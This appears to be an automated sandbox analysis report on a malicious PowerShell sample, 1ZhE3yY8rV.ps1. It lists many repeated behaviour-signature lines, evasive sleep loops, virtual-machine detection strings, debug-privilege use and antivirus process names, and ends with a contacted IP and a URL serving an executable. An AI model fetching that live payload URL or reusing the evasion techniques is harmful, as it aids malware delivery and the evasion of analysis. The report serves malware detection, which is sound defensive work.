Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4592 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5278 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736 Thread sleep time: -12912720851596678s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: Amcache.hve.7.dr Binary or memory string: VMware
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: powershell.exe, 00000000.00000002.2158398672.0000019940402000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_@
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: powershell.exe, 00000000.00000002.2186782960.000001995A7DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
Source: Amcache.hve.7.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.7.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: MsMpEng.exe
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1542345 Sample: 1ZhE3yY8rV.ps1 Startdate: 25/10/2024 Architecture: WINDOWS Score: 64 16 Antivirus / Scanner detection for submitted sample 2->16 18 Multi AV Scanner detection for submitted file 2->18 20 AI detected suspicious sample 2->20 6 powershell.exe 14 20 2->6         started        process3 dnsIp4 14 217.195.153.196, 49730, 49731, 80 SHOCK-1US Netherlands 6->14 22 Found suspicious powershell code related to unpacking or dynamic code loading 6->22 10 WerFault.exe 20 16 6->10         started        12 conhost.exe 6->12         started        signatures5 process6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
217.195.153.196
 unknown Netherlands
395092 SHOCK-1US false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://217.195.153.196/assets/paleochorologyma.exe false
    		unknown